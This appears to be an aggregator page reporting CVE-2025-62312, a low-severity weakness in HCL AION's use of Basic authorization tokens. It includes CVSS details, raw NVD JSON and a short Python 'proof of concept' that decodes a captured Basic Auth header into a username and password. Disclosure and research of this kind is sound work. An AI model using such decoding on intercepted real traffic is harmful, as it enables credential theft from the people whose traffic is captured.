Security Vulnerability Report
中文
CVE-2025-62312 CVSS 3.0 LOW

CVE-2025-62312

Published: 2026-05-14 17:16:18
Last Modified: 2026-05-14 17:22:47

Description

HCL AION is affected by a vulnerability where basic authorization tokens are used for authentication. Use of basic authorization mechanisms may expose credentials to potential interception or misuse, especially if not combined with secure transmission practices.

CVSS Details

CVSS Score
3.0
Severity
LOW
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

HCL AION (具体版本未在信息中披露)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import base64 import sys # Proof of Concept: Decoding captured Basic Auth token # This demonstrates the risk of using Basic Auth without encryption. def decode_basic_auth(header_value): try: # Basic Auth header format: "Basic <base64_string>" encoded_part = header_value.split()[1] decoded_bytes = base64.b64decode(encoded_part) credentials = decoded_bytes.decode('utf-8') return credentials except Exception as e: return f"Error: {e}" # Example captured header from vulnerable HCL AION traffic captured_header = "Basic dXNlcjpwYXNzd29yZA==" print(f"Captured Header: {captured_header}") print(f"Decoded Credentials: {decode_basic_auth(captured_header)}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62312", "sourceIdentifier": "[email protected]", "published": "2026-05-14T17:16:18.480", "lastModified": "2026-05-14T17:22:46.577", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION is affected by a vulnerability where basic authorization tokens are used for authentication. Use of basic authorization mechanisms may expose credentials to potential interception or misuse, especially if not combined with secure transmission practices."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.0, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130636", "source": "[email protected]"}]}}